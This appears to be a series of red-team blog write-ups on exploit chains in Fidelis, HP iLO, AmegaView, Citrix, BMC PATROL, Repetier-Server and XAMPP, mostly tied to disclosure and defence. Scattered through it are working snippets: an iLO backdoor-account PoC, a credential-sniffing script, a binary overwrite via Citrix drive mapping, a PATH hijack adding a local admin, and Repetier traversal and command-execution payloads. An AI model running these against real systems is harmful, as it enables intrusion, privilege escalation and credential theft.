First order of business was to do some basic enumeration of the devices in this network segment. The F5s had been updated just after a recent RCE bug had been published, so I moved on. The Fidelis CommandPost web application presented a CAS-based login portal on the root URL, as seen below.

After some minimal research on CAS, which appeared to be a rather mature and widely used authentication library, I decided to start brute-forcing endpoints on the CommandPost web application with dirsearch. While that was running, I moved on to the HP iLOs to see what we had there.

The first thing that jumped out at me about this particular iLO endpoint was that it was HP and the displayed version was under 2.53. This is interesting because a heap-based buffer overflow vulnerability (CVE-2017-12542) was discovered a few years back that can be exploited to create a new privileged user.

Exploitation – HP iLO (CVE-2017-12542)

While my scanner was still enumerating endpoints on the CommandPost, I went ahead and fired up the iLO exploit to confirm whether or not the target was actually exploitable. Sure enough, I was able to create a new admin user and log in.
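
For reference, the public PoC for CVE-2017-12542 boils down to sending an oversized Connection header that overflows a fixed-size buffer and bypasses authentication on the iLO REST API. A sketch based on the widely published exploit (host and account details are placeholders):

    # CVE-2017-12542 sketch: a 29-byte Connection header disables auth checks.
    import requests

    target = "https://ilo.example"  # placeholder
    bypass = {"Connection": "A" * 29}
    account = {
        "UserName": "backdoor", "Password": "S3cr3tP@ss!",  # placeholders
        "Oem": {"Hp": {"LoginName": "backdoor", "Privileges": {
            "LoginPriv": True, "RemoteConsolePriv": True, "UserConfigPriv": True,
            "VirtualMediaPriv": True, "VirtualPowerAndResetPriv": True,
            "iLOConfigPriv": True}}},
    }
    r = requests.post(f"{target}/rest/v1/AccountService/Accounts",
                      json=account, headers=bypass, verify=False)
    print(r.status_code, r.text[:200])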

We now have privileged access to the iLO web management portal of some unknown server. Outside of getting some server statistics and being able to turn the server on and off, what can we actually do that’s useful from an attacker’s perspective? For one, we can utilize the remote console feature. HP iLOs actually provide two ways to do this: one via Java Web Start from the web interface and one over SSH (which shares the credentials of the web interface).

Loading up the remote console via Java for this iLO reveals that this server is actually a Fidelis Direct Sensor appliance. Access to the remote console in itself is not super useful since you still have to have credentials to log in to the server. However, when you bring up the Java Web Start remote console, you’ll notice a menu that says “Virtual Drives”. What this menu allows you to do is remotely mount an ISO of your choosing.

The ability to mount a custom ISO remotely introduces a possible avenue for code execution. If the target server does not have a BIOS password and doesn’t utilize full disk encryption, we should be able to boot to an ISO we supply remotely and gain access to the server’s file system. This technique definitely isn’t subtle as we have to turn off the server, but maybe the system owner won’t notice if the outage is brief 🙂

If you are reading this, there’s a good chance you’ll be attempting to pull this off through some sort of proxy/C2 comms mid-operation rather than physically sitting at a system on the same network. This makes the choice of ISO critical since network bandwidth is limited. A live CD image that is as small as possible is ideal. I originally tried the 30 MB TinyCore Linux but eventually landed on the 300 MB Puppy Linux since it comes with a lot more features out of the box. Once the OS loaded up, I mounted the filesystem and confirmed access to critical files.

Since the device had SSH enabled, I decided the easiest mechanism for compromise would be to simply add an SSH public key to the root user’s authorized_keys file. The “sshd_config” also needed to be updated to allow root login and enable public key authentication.
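
The two sshd_config directives in question:

    PermitRootLogin yes
    PubkeyAuthentication yes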

Exploitation – Unauthenticated Remote Command Injection (CVE-2021-35047)

After gaining initial access to the Fidelis Direct Sensor appliance via SSH, I began poking around at the services hosted on the device and investigating what other systems it was communicating with. One of the first things I noticed was lots of connections back to the Fidelis CommandPost appliance on port 5556 from an rconfigc process. I also noticed an rconfigd process listening on the sensor; my assumption was that this was some kind of client/server setup between the appliances.

Analyzing the rconfigc/rconfigd binaries revealed they were a custom remote script execution framework. The framework consisted of a simple TLS-based client/server application backed mostly by Perl scripts at varying privilege levels, utilizing hard-coded authentication. I reviewed a couple of these scripts and came across the following code snippet.

If you haven’t spotted the bug here, those backticks in Perl execute the enclosed string as a shell command. Since there are no checks sanitizing the incoming input for the user variable, additional commands can be executed by simply adding a single quote and a semicolon. Another perk of this particular command is that it is run as root, so we get automatic privilege escalation for free. I decided to test this remotely against the Fidelis CommandPost to confirm it actually worked.

Exploitation – Unauthenticated Remote SQL injection (CVE-2021-35048)

Circling back around to the Fidelis CommandPost web application, my dirsearch brute-forcing had revealed some interesting endpoints worth investigating. While the majority required authentication, I found two that accepted XML and did not. After trying several different payloads, I managed to get a SQL error returned in the output of one of the requests.

Exploitation – Insecure Credential Storage (CVE-2021-35050)

Using the SQL injection vulnerability identified above, I proceeded to dump the CommandPost database. My goal was to find a way to authenticate to the web application. What I found was a table that stored entries referred to as UIDs. These hex-encoded strings turned out to be the product of a reversible encryption mechanism over a string created by concatenating a username and password. Decrypting this value returned credentials that could then be used to log in to the Fidelis web application.

Exploitation – Authenticated Remote Command Injection (CVE-2021-35049)

With decrypted root credentials from the database, I authenticated to the web application and began searching for new vulnerabilities in the expanded scope. After a little bit of fuzzing, and help from my previous access, I identified a command injection vulnerability that could be triggered from the web application.

Chaining this vulnerability with each of the previous bugs I was able to create an exploit that could execute root level commands across any managed Fidelis device from an unauthenticated CommandPost web session.

The DATA

So here we are: root-level access to a suite of tools that captures and modifies network traffic across an enterprise. It was now time to switch gears and begin investigating what functionality these devices provide and how it could be abused by an attacker (post-compromise risk assessment). After navigating through the CommandPost web application endpoints and performing some minimal system enumeration on the devices, I felt like I had a handle on how the systems work together. There are three device types: CommandPosts, Sensors, and Collectors. The Sensors collect, inspect, and modify traffic; the Collectors store the data; and the CommandPost provides the web interface for managing the devices.

Given the role of each device, I think the most interesting target for an attacker would have to be a Sensor. If a Sensor can intercept (and possibly modify) traffic in transit, an attacker could leverage it to take control of the network. To confirm this theory, I logged in to a Sensor and began searching for the software and services needed to do this. I started by trying to identify the network interface(s) the data would be traversing. To my surprise, the only interface that showed as being “up” was the one I had logged in to. Time to RTFM.

A picture is worth a thousand words. Based on the figures from the manual shown above, my guess is that the traffic is likely traversing one of the higher-numbered interfaces. Now I just have to figure out why they aren’t visible to the root user. After searching through the logs, I found the following clue.

It appears a custom driver is being loaded to manage the interfaces responsible for the network traffic monitoring. Since the base OS is CentOS, it must be mounting them in some kind of security container that restricts access to the devices, which is why I can’t see them. After digging into the driver and some of the processes associated with it, I found that the software uses libpcap and a ring buffer in file-backed memory to intercept the network traffic to be inspected/modified. This means that to access all of the traffic flowing through the device, all we have to do is read the files in the ring buffer and parse the raw network packets (a sketch of the idea follows below). Running the script for just a short time confirmed our theory. We quickly noticed the usual authentication flows for major websites like Microsoft O365, Gmail, and even stock trading platforms. To put it plainly, compromise of a Fidelis Sensor means an attacker would have unfettered access to all of the unencrypted credentials, PII, and sensitive data exiting the monitored network.
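
My parsing script isn’t reproduced here, but the idea is simple. A rough sketch, assuming the ring-buffer contents can be carved out as standard pcap data (an assumption on my part; the actual on-disk format isn’t documented):

    # Scan carved packets for plaintext credential markers (sketch).
    from scapy.all import rdpcap, Raw, TCP

    for pkt in rdpcap("ringbuffer_dump.pcap"):  # hypothetical carved capture
        if pkt.haslayer(TCP) and pkt.haslayer(Raw):
            payload = bytes(pkt[Raw].load)
            if b"Authorization:" in payload or b"password=" in payload:
                print(payload[:120])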

Given the impact of our discovery and what was possible post-compromise on these devices, we wrapped up our assessment and immediately reached out to the customer and the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We are happy to report that the disclosure process with the vendor went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Fidelis Network & Deception appliances to update to the latest version immediately.

MesaLabs AmegaView: Information Disclosure to RCE

This article is in no way affiliated, sponsored, or endorsed with/by MesaLabs. All graphics are being displayed under fair use for the purposes of this article.

During a recent assessment, multiple vulnerabilities of varied bug types were discovered in the MesaLabs AmegaView Continuous Monitoring System, including command injection (CVE-2021-27447, CVE-2021-27449), improper authentication (CVE-2021-27451), authentication bypass (CVE-2021-27453), and privilege escalation (CVE-2021-27445). In this blog post, we will describe each of the vulnerabilities and how they were discovered.

Recon

While operating, we often encounter devices that make up what we colloquially refer to as the “internet of things”, or simply IoT. These are various network-enabled devices outside of the usual workstations, servers, switches, routers, and printers. IoT devices are often overlooked by network defenders since they often come with custom applications and are more difficult to adequately monitor. As red teamers, we pay particular attention to these systems because they can provide reliable persistence on the network and are generally less secure.

The first thing that caught my eye about the AmegaView login page was that it required a passkey for authentication rather than the usual username and password. My initial inclination was to gather more information about the passkey to determine if I could brute-force it. So I started where we all do: I checked the web page source.

Amega Log In Page
Login Page Source

The source code revealed a couple of details about the passkey. The “size” and “maxlength” of the password field are set to 10. We would still need more information to realistically brute-force the passkey, as 10 characters is too long. However, the source code disclosed two more crucial pieces of information: the existence of the “/www” directory and the “/index.cgi?J=TIME_EDIT” endpoint.

www directory

Navigating to the “/www” directory in a web browser produces a directory listing that includes two Perl files, among others. We also find we can navigate to “/index.cgi?J=TIME_EDIT” without authentication.

The Perl file “amegalib.pl” divulges quite a bit of information. It defines how the passkey is generated and contains a function, reachable from the “/index.cgi?J=TIME_EDIT” endpoint, that executes privileged OS commands. It also details the mechanism for authentication, which includes two hardcoded cookie values: one for regular users and one for “super” users.

Exploitation

With so many vulns, where do we begin? First, I took the function that generates the passkey and simply ran it. The Perl script produces what is typically a 4-6 digit number loosely based on the current time of the system. Using this passkey we can log into the system as a “super” user. Once logged in, the options available to a “super” user include the ability to upload new firmware, change certain system options, and run a “ping-out” test.

Super User Logged In

Clicking on the link to the “Ping-Out Test” brings us to a page that seems right out of a CTF. We are presented with an input field that expects an IP address to ping. Entering an IP address, we see that the server runs the ping command 5 times and prints the output. We quickly discover that arbitrary commands can be appended to the IP address using a pipe “|” character, giving us command execution.

With proven command execution, the next step was to spawn a netcat reverse shell and begin enumerating the file system in search of more vulnerabilities.

Privilege Escalation

Having discovered a way to execute commands as an unprivileged user, the next goal was to find a way to escalate to root on the underlying system. We noticed a promising function in the “amegalib.pl” file called “run_SUcommand”. Since the current user had the ability to write files to the web root, I just created a CGI file that called the “run_SUcommand” function from “amegalib.pl”. After confirming that worked, I used netcat again to spawn a shell as root. After looking through the source code, I found this function is also reachable as an authenticated user from the previously mentioned “/index.cgi?J=TIME_EDIT” endpoint. The vulnerable code is shown below.

The “set_datetime” function displayed above concatenates data supplied by the user and then passes it to the “run_SUcommand” function. Arbitrary code execution as the root user can be achieved by sending a specially crafted time update request with the desired shell commands as shown below.

Wrap Up

This product will reach its end of life at the end of December 2021.  MesaLabs has stated that they do not plan to release a patch, so system owners beware!

Hacking Citrix Storefront Users

This article is in no way affiliated, sponsored, or endorsed with/by Citrix Systems, Inc. All graphics are being displayed under fair use for the purposes of this article.

With the substantial shift from traditional work environments to remote/telework-capable infrastructures due to COVID-19, products like Citrix Storefront have seen a significant boost in deployment and usage. In light of this shift, we thought we’d present a subtle configuration point in Citrix Receiver that can be exploited for lateral movement across disjoint networks. More plainly, this (mis)configuration can allow an attacker who has compromised the virtual Citrix Storefront environment to compromise the systems of the users that connect to it using Citrix Receiver.

Oopsie

For those that aren’t familiar with Citrix Storefront, it is made up of multiple components and is often associated with other Citrix products like Citrix Receiver/Workspace, XenApp, and XenDesktop. To oversimplify, it gives users the ability to remotely access shared virtual machines or virtual applications.

To be able to remote into these virtual environments, a user has to download and install Citrix Workspace (formerly Receiver). Upon install, the user is greeted with the following popup, and the choice is stored in the registry for that user.

What we’ve found is that more often than not, end-users as well as group-policy-managed systems have this configuration set to “Permit All Access”, likely because it isn’t very clear what you are permitting all access to, or whether it is necessary for proper usage of the application. I for one can admit to having clicked “Permit All Access” prior to researching what this setting actually means.

So what exactly does this setting do? It makes the current user’s local drives available as a share on the remote Citrix virtual machine. If the user selects “Permit All Access”, files can be moved from the remote system to the user’s shared drives.

Ok, so a user can copy files from the remote system; why is this a security issue? Because there is now no security boundary between the user’s system and the remote Citrix environment. If the remote Citrix virtual machine is compromised, an attacker can freely write files to the connecting user’s shared drive without authentication.

Giving an attacker the ability to write files on your computer doesn’t sound that bad, right? Especially if you are a low-privileged user on the system. What could they possibly do with that? They could overwrite binaries that are executed by the user or the operating system. A simple example of trivial code execution on Windows 10 is overwriting the OneDriveStandaloneUpdater binary located in the user’s AppData directory. This binary is run daily by a scheduled task, as sketched below.
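
A sketch of the idea; the UNC path for the Citrix client drive mapping and the victim profile path are assumptions that vary by deployment.

```python
import shutil

# From the compromised Citrix VM, the connecting user's local drives are
# reachable through the client drive mapping (assumed here as \\Client\C$).
payload = r"C:\temp\payload.exe"
target = (r"\\Client\C$\Users\victim\AppData\Local\Microsoft\OneDrive"
          r"\OneDriveStandaloneUpdater.exe")

# Overwrite the user-writable updater; the OneDrive update scheduled task
# will execute it in the user's session.
shutil.copyfile(payload, target)
```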

Recommendations

Use the principle of least privilege when using Citrix Workspace to remote into a shared Citrix virtual environment. By default, set the file security permissions for Citrix Workspace to “No Access” and only change it temporarily when it is necessary to copy files to or from the remote virtual environment. The following Citrix article explains how to change these settings in the registry: https://support.citrix.com/article/CTX133565

BMC Patrol Agent – Domain User to Domain Admin – Part 2

Securifera is in no way affiliated, sponsored, or endorsed with/by BMC. All graphics produced are in no way associated with BMC or its products and were created solely for this blog post. All uses of the terms BMC, PATROL, and any other BMC product trademarks are intended only for identification purposes and are to be considered fair use throughout this commentary. Securifera is offering no competing products or services with the BMC products being referenced.

Recap

A little over 2 years ago I wrote a blog post about a red team engagement I participated in for a customer that utilized BMC PATROL for remote administration on the network. The assessment culminated with our team obtaining domain admin privileges on the network by exploiting a critical vulnerability in the BMC PATROL software. After coordinating with the vendor, we provided several mitigations to the customer. The vendor characterized the issue as a misconfiguration and gave guidance on how to better lock down the software. Two years later we executed a retest for the customer, and this blog post describes what we found.

From a red teamer’s perspective, the BMC PATROL software can be described as a remote administration tool. The vulnerability discovered in the previous assessment allowed an unprivileged domain user to execute commands on any Windows PATROL client as SYSTEM. As if that weren’t bad enough, this software was running on each of the customer’s domain controllers.

The proposed mitigation to the vulnerability was a couple of configuration changes that ensured the commands were executed on the client systems under the context of the authenticated user.

A specific PATROL Agent configuration parameter (/AgentSetup/pemCommands_policy = “U” ) can be enabled that ensures the PATROL Agent executes the command with (or using) the PATROL CLI connected user.

reference: https://docs.bmc.com/docs/display/pia100/Setting+the+default+account+for+PEM+commands.

Restricted mode. Only users from Administrators group can connect and perform operations (“/AgentSetup/accessControlList” = “:Administrators/*/CDOPSR”):

reference: https://docs.bmc.com/docs/PATROLAgent/113/security-guidelines-for-the-patrol-agent-766670159.html

Unprivileged Remote Command Execution

Given the results from our previous assessment, as soon as we secured a domain credential I decided to test out PATROL again. I started up the PatrolCli application and tried to send a command to test whether it would be executed as my user or a privileged one. (In the screenshot, the IP shows loopback because I was sending traffic through an SSH port forward)

The output suggested the customer had indeed implemented the mitigations suggested by the vendor. The command was no longer executed with escalated privileges on the target, but as the authenticated user. The next thing to verify was whether the domain’s authorization checks were being enforced. To give a little background here, in most Windows Active Directory implementations, users are added to specific groups to define what permissions they have across the domain. Oftentimes these permissions specify which systems a user can log in to or execute commands on. This domain was no different, in that very stringent access control lists were defined on the domain for each user.

A simple way to test whether authorization checks were being performed properly was to attempt to log in/execute commands with a user on a remote Windows system using RDP, SMB, or WMI, then perform the same test using BMC PATROL and compare the results. To add further confidence to my theory, I decided to test against the most locked-down system on the domain, the domain controller. Minimal reconnaissance showed the DC only allowed a small group of users remote access and required an RSA token for 2FA. Not surprisingly, I was able to execute commands directly on the domain controller with an unprivileged user that did not have the permissions to log in or remotely execute on the system with standard Windows methods.

As this result wasn’t unexpected based on my previous research, the next question to answer was whether I could do anything meaningful on a domain controller as an unprivileged user that had no defined permissions on the system. The first thing that stood out to me was the absence of a writable user folder, since PATROL had bypassed the OS’s normal access controls. This meant my file system permissions would be bound to those set for the “Users”, “Authenticated Users”, and “Everyone” groups. To make things just a little bit harder, I discovered that a policy was in place that only allowed the execution of trusted signed executables.

Escalation of Privilege

With unprivileged remote command execution using PATROL, the next logical step was to try and escalate privileges on the remote system. As a red teamer, the need to escalate privileges from an unprivileged user to SYSTEM occurs pretty often. It is also quite surprising how common it is to find vulnerabilities in Windows services and scheduled tasks that can be exploited to escalate privileges. I spent a fair amount of time hunting for these types of bugs following research by James Forshaw and others several years back.

The first thing I usually check for when I’m looking for Windows privilege escalation bugs is whether there are any writable folders in the current PATH environment variable. For such an old and well-known misconfiguration, I come across this ALL THE TIME. A writable folder in the PATH is not a guaranteed win; it is one of two requirements for escalating privileges. The second is finding a privileged process that insecurely loads a DLL or executes a binary. By insecurely, I mean not specifying the absolute path to the resource. When this happens, Windows attempts to locate the binary by searching the folders defined in the PATH variable. If an attacker has the ability to write to a folder in the PATH, they can drop a malicious binary that will be loaded or executed by the privileged process, thus escalating privileges.

Listing the environment variables with “set” on the target reveals that it does indeed have a custom folder on the root of the drive in the PATH. At a glance I already have a good chance that it is writable, because by default any new folder on the root of the drive is writable based on permission inheritance. A quick test confirms it.
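
One quick way to perform that test is to probe each PATH entry for write access, as in this minimal sketch:

```python
import os

# Probe each directory in PATH for write access by the current user.
for d in os.environ["PATH"].split(os.pathsep):
    probe = os.path.join(d, "write_probe.tmp")
    try:
        with open(probe, "w") as f:
            f.write("x")
        os.remove(probe)
        print(f"[+] writable: {d}")
    except OSError:
        pass
```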

With the first requirement for my privilege escalation confirmed, I then moved on to searching for a hijackable DLL or binary. The most common technique is to simply open up Sysinternals Process Monitor and begin restarting all the services and scheduled tasks on the system. This isn’t really a practical approach in our situation, since restarting these processes already requires a privileged context and an interactive session.

What we can do is attempt to model the target system in a test environment and perform this technique in hopes that any vulnerabilities will map to the target. The obvious first privileged service to investigate is BMC PATROL. After loading up Process Monitor and restarting the PatrolAgent service, I added a filter to look for “NO SUCH FILE” and “NAME NOT FOUND” results. Unfortunately I didn’t see any relative loading of DLLs. I did see something else interesting though.

What we’re seeing here is the PatrolAgent service executing “cmd /c bootime” whenever it is started. Since an absolute path is not specified, the operating system attempts to locate the application using the PATH. An added bonus is that the developers didn’t even bother to add an extension, so we aren’t limited to an executable (this will be important later). In order for this to be successful, our writable folder has to be listed earlier in the PATH search order than the actual path of the real bootime binary. Fortunately for me, the target system lists the writable folder first in the PATH search order. To confirm I can actually get execution, I drop a “bootime.bat” file in my test environment and watch as it is successfully selected from a folder earlier in the PATH search order.

So that’s it, right? Time to start raining shells all over the network? Not quite yet. As most are probably aware, an unprivileged user doesn’t typically have the permissions necessary to restart a service. This means the most certain way to get execution is each time the system reboots. Unfortunately, on a server that could be weeks or longer, especially for a domain controller. Another possibility could be to try and crash the service and hope it is configured to restart. Before I capitulated to these ideas, I decided to research whether the application, in all its complexity and robustness, actually provided this feature in some way. A little googling later I came across the following link. Supposedly I could just run the following command from an adjacent system with PATROL and the remote service would restart.

pconfig +RESTART -host

Sure enough, it worked. I didn’t take the time to reverse engineer what other possibilities existed with this new “pconfig” application that apparently had the ability to perform at least some privileged operations without authentication. I’ll leave that for PART 3 if the opportunity arises.

Combining all of this together, I now had all of the necessary pieces to again achieve domain admin with only a low-privileged domain user using BMC PATROL. I wrote “net localgroup Administrators <user> /add” to C:\Scripts\bootime.bat using PATROL and then executed “pconfig +RESTART -host” to restart the service and add my user to the local administrators group. I chose to go with “bootime.bat” rather than “bootime.exe” because it provided me with privileged command execution while also evading the execution policy that required trusted signed executables. It was almost too good to be true.

Following the assessment, I reached out to BMC to responsibly disclose the binary hijack in the PatrolAgent service. They were quick to reply and issue a patch. The vulnerability is being tracked as CVE-2020-35593.

Recommendations

The main lesson to be learned from this example is to always be cognizant of the security implications each piece of software introduces into your network. In this instance, the customer had invested significant time and resources to lock down their network. It had stringent access controls, group policies, and multiple two-factor authentication mechanisms (smart cards and RSA tokens). Unfortunately, however, they also installed a remote administration suite that subverted almost all of these measures. While IT professionals have a myriad of third-party remote administration tools at their disposal, oftentimes it is much safer to just use the built-in mechanisms supported by the operating system for remote administration. At least this way there is a higher probability that the tooling was designed to properly utilize the authentication and authorization systems in place.

A 3D Printed Shell

A 3D Printed Shell

With 3D printers getting a lot of attention during the COVID-19 pandemic, I thought I’d share a post about an interesting handful of bugs I discovered last year. The bugs were found in a piece of software that is used for remotely managing 3D printers. Chaining these vulnerabilities together enabled me to remotely exploit the Windows server hosting the software with SYSTEM level privileges. Let me introduce “Repetier-Server”, the remote 3D printer management software.

Exploration

Like many of my past targets, I came across this software while performing a network penetration test for a customer. I first noticed the page above while reviewing screenshots of all of the web servers in scope of the assessment. Having never encountered this software before, I loaded it up in my browser and started checking it out. After exploring some of the application’s features, I googled the application to see if I could find some documentation, or better, download a copy of the software to install. I was happy to find that not only could I download a free version of the software, but they also provided a nice user manual that detailed all of the features.

In scenarios where I can obtain the software, my approach to vulnerability discovery is slightly different from the typical black-box web application assessment. Since I had access to the code, I had the ability to disassemble/decompile the software and directly search for vulnerabilities. With time constraints being a concern, I started with the low-hanging fruit and worked towards the more complex vulnerabilities. I reviewed the documentation looking for mechanisms where the software might execute commands against the operating system. Oftentimes, simple web applications are nothing more than a web-based wrapper around a set of shell commands.

I discovered the following blurb in the “Advanced Setup” section of the documentation that describes how a user can define “external” commands that can be executed by the web application.

As I had hoped, the application already had the ability to execute system commands; I just had to find a way to abuse it. The documentation provided the syntax and XML structure for the external command config file.

The video below demonstrates the steps necessary to define an external command, load it into the application, and execute it. These steps would become requirements for the exploit primitives I needed to discover in order to achieve remote code execution.

Discovery

Now that I had a feature to target, external commands, I needed to identify the technical requirements to reach that function. The first and primary goal was to find a way to write a file to disk from the web application. The second goal was ensuring I had sufficient control over the content of the file to pass any XML parsing checks. The remaining goals were nice-to-haves: a way to trigger a reboot/service restart, the ability to read external command output, and file system navigation for debugging.

I started up Sysinternals Process Monitor to help me identify the different ways I could induce a file write from the web application. I then added a filter to only display file write operations by the RepetierServer.exe process.

Bug: 1  – File Upload & Download – Arbitrary Content – Constant PATH 

The first file write opportunity I found was in the custom watermark upload feature in the “Global Settings -> Timelapse” menu. Process Monitor shows the RepetierServer process writes the file to “C:\ProgramData\Repetier-Server\database\watermark.png”. I had to tweak my Process Monitor filters because the file first gets written to a temp file called upload1.bin and then renamed to watermark.png.

If you attempt to upload a file with an extension other than “.png” you will get a “Wrong file format” error. I opened up Burp to take a look at the HTTP request and see if modifying it in transit would allow us to bypass this check. Oftentimes developers make the mistake of only performing client-side security checks in JavaScript, which can be easily bypassed by sending the request directly.

Manually manipulating each of the fields, I found a couple of interesting results. It appears the only security check performed server-side is a file extension check on the filename field in the request form. This check is largely moot since the destination file on disk is constant. However, I did find that the file content can be whatever I want. The web application also provides another endpoint that allows for the retrieval of the watermark file. While this isn’t immediately useful, it means if I can write arbitrary data to the watermark file location, I can read it back remotely. I’ll save this away for later in case we need it.
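
A sketch of the bypass; the endpoint path and form field name are assumptions. Keep a “.png” filename to satisfy the extension check, but send arbitrary bytes.

```python
import requests

# Hypothetical endpoint/field names -- the extension check only looks at the
# filename, so arbitrary content passes as long as the name ends in .png.
url = "http://target:3344/upload/watermark"
files = {"filename": ("watermark.png", b"arbitrary bytes, not a real PNG")}

r = requests.post(url, files=files)
print(r.status_code)
```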

Bug: 2  – File Upload – Uncontrolled Content – Partially Controlled PATH (Directory Traversal), Controlled File Name, Uncontrolled Extension  

Continuing with my mission of identifying file upload possibilities, I started to investigate the flow for adding a new printer to be managed by the web application. The printer creation wizard is pretty straightforward. The following video demonstrates how to create a fake printer on a Windows host running in VMware Workstation.

Based on the Process Monitor output, it appears that when a new printer is created, an XML file named after the printer is created in the “C:\ProgramData\Repetier-Server\configs” directory, as well as a matching directory under “C:\ProgramData\Repetier-Server\printer” with additional subdirectories and files.

Identifying the request responsible for creating the new printer in Burp proved elusive until I figured out that the web application utilizes websockets for much of the communication to the server. After some trial and error I identified the websocket request that creates the printer configuration file on disk.

From here I began modifying the different fields of the request to see what interesting effects might happen. Since the configuration file name mirrored the printer name, the first thing I tried was prepending a directory traversal string to the printer name in the websocket request to see if I could alter the path. Given my goal of creating an external command configuration file, I named my printer “..\\database\\extcommands”. To my surprise, it worked!!

At this point I could write to the file location necessary to load an external command, getting me substantially closer to full remote code execution. However, I still could not control the file contents. I decided to go ahead and script up a quick POC to reliably exploit the vulnerability and move on.
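
A rough sketch of that POC using the websocket-client package; the URL and message structure here are simplified assumptions, not the application’s exact protocol.

```python
import json
import websocket  # pip install websocket-client

# The printer name is used verbatim to build the config file path, so a
# traversal sequence redirects the write to database\extcommands.xml.
ws = websocket.create_connection("ws://target:3344/socket")  # assumed URL
msg = {
    "action": "createPrinter",                              # assumed action
    "data": {"name": "..\\database\\extcommands"},
}
ws.send(json.dumps(msg))
print(ws.recv())
```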

Bug: 3  – File Upload & Download – Partially Controlled Content – Uncontrolled PATH – Insufficient Validation

Starting from where I left off with the directory traversal bug, I began investigating ways I could try and modify the printer configuration file that I had written as the external configuration file. Luckily for me, the web application provided a feature for downloading the current configuration file or replacing it with a new one.

Coming off the high from my last bug I figured why not just try and use this feature to upload the external command configuration file for the win. Nope… Still more work to do.

Since both files were XML, I began trying different combinations of elements from each configuration file to try and satisfy whatever validation checks were happening. After spending a fair amount of time on this, I decided to just open the binary up in IDA Pro and look for myself. Rather than bore you with disassembly and the tedium that followed, I’ll skip right to the end. Because full validation was not performed on every element of either the printer configuration file or the external command configuration file, a single XML file could be constructed that passed validation for both formats by including the elements each parser checked. This meant I was able to use the “Replace Printer Configuration” feature to add an external command to my extcommands.xml file.
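
Conceptually the polyglot looked something like the following; the element names below are approximations for illustration, not the exact schema.

```xml
<config>
  <!-- elements the printer-config parser checks -->
  <general name="extcommands" firmware="Marlin"/>
  <!-- elements the external-command parser checks -->
  <extcommands>
    <command>
      <name>pwn</name>
      <execute>cmd /c whoami</execute>
    </command>
  </extcommands>
</config>
```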

Bug: 4  (BONUS) – Remote File System Enumeration

Digging further into the web application, I also discovered an interesting “feature” located in the “Global Settings -> Folders” menu. The web application allows a user to add a registered folder to import files for 3D printing. The first thing I noticed about this feature is that it is not constrained to a particular folder and can be used to navigate the folder structure of the entire target file system. This can be achieved by simply clicking the “Browse” button.

Since this feature references the ability to print from locations on disk, I decided to investigate further by creating a Folder at C:\ and seeing where it was referenced. After creating a printer and selecting it from the main page, a menu that looks like a triangle can be selected in the top right of the page.

When I select the Folder, the following window is displayed. If I deselect the “Filter Wrong File Types” checkbox, the dialog basically becomes a remote file browser for the system. The great thing about this feature from an attacker’s perspective is that it gives me the ability to confirm exploitation of the directory traversal file upload vulnerability identified earlier.

Exploitation

Using the vulnerabilities discovered above, I mapped out the different stages of the exploit chain that needed to be implemented. The only piece that I lacked for the exploit chain was the ability to remotely restart the RepetierServer service or the system. Since the target system was a user’s workstation, I would just have to hope that they would reboot the system at some point in the near future. This also meant that replacing the external command would be impractical since it required a service restart each time. I would need to ensure that whatever external command I created was reliable and flexible enough to support the execution of subsequent system commands. Fortunately for me, I had just the bug for this. I could use the watermark file upload & download vulnerability as a medium for storing the commands I wanted to execute, and the resulting output. The following external command achieves this goal by reading from the watermark file, executing its contents, and then piping the output to the watermark file.

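Conceptually, the external command looked like the following sketch; the element names and the exact shell one-liner are approximations, not the original file.

```xml
<config>
  <extcommands>
    <command>
      <name>watermark-runner</name>
      <!-- copy the uploaded "watermark" to a batch file, run it, and pipe
           the output back to the watermark location for remote retrieval -->
      <execute>cmd /c copy /y C:\ProgramData\Repetier-Server\database\watermark.png C:\Windows\Temp\c.bat &amp; C:\Windows\Temp\c.bat &gt; C:\ProgramData\Repetier-Server\database\watermark.png</execute>
    </command>
  </extcommands>
</config>
```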

Putting this all together, I came up with the following exploit flow that needed to be implemented.

I implemented each step in this python POC. The following video demonstrates it in action against my test RepetierServer installation.

After successfully testing the POC, I executed it against the target server on the customer’s network. It took ~3 days until the system was rebooted, but I was ultimately able to remotely compromise the target. When the penetration test was complete, I reached out to the vendor to report the vulnerabilities and they were quick to patch the software and release an update. I also coordinated the findings with MITRE and two CVEs were issued, CVE-2019-14450 & CVE-2019-14451.

403 to RCE in XAMPP

403 to RCE in XAMPP

Some of the best advice I was ever given about becoming more successful at vulnerability discovery is to always try and dig a little deeper. Whether you are a penetration tester, red teamer, or bug bounty hunter, this advice has always proven true. Far too often it is easy to become reliant on the latest “hacker” toolsets and other people’s exploits or research. When those fail, we often just move on to the next low-hanging fruit rather than digging in.

On a recent assessment, I was performing my usual network recon and came across the following webpage while reviewing the website screenshots I had taken.

The page displayed a list of significantly outdated software running behind this webserver. Having installed XAMPP before, I was also familiar with the very manual and tedious process of updating each of the embedded services bundled with it. My first step was to try and enumerate any web applications being hosted on the webserver. Right now my tool of choice is dirsearch, mainly because I’ve gotten used to its syntax and haven’t found a need for something better.

After having zero success enumerating any endpoints on the webserver, I decided to set up my own XAMPP installation mirroring the target system. The download page for XAMPP can be found here. It has versions dating all the way back to 2003. From the 403 error page we can piece together what we need to download the right version of XAMPP. We know it’s a Windows install (Win32). If we look up the release date for the listed PHP version, we can see it was released in 2011.

Based on the release date we can reliably narrow it down to a couple of candidate XAMPP  installations.

After installing the software, I navigated to the apache configuration file directory to see what files were being served by default. The default configuration is pretty standard with the root directory being served out of C:\xampp\htdocs. What grabbed my attention was the “supplemental configurations” that were included at the bottom of the file.

The main thing to pay attention to in these configuration files is the lines that start with ScriptAlias, as they map a directory on disk to one reachable from the web server. Only two show up: /cgi-bin/ and /php-cgi/. What is this php-cgi.exe? This seems awfully interesting…

After a few searches on Google, it seems the php-cgi binary has the ability to execute PHP code directly. I stumbled across an exploit that lists the version of the target as vulnerable, but it is targeting Linux instead of Windows. Since PHP is cross-platform, I can only assume the Windows version is also affected. The exploit also identifies the vulnerability as CVE-2012-1823.

Did I hit the jackpot??? Did XAMPP slide under the radar as being affected by this bug when it was disclosed? With this CVE in hand, I googled a little bit more and found an article by Praetorian that mentions the same php-cgi binary and conveniently includes a Metasploit module for exploiting it. Loading it up into Metasploit, I changed the TARGETURI to /php-cgi/php-cgi.exe and let it fly. To my surprise, remote code execution as SYSTEM.
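
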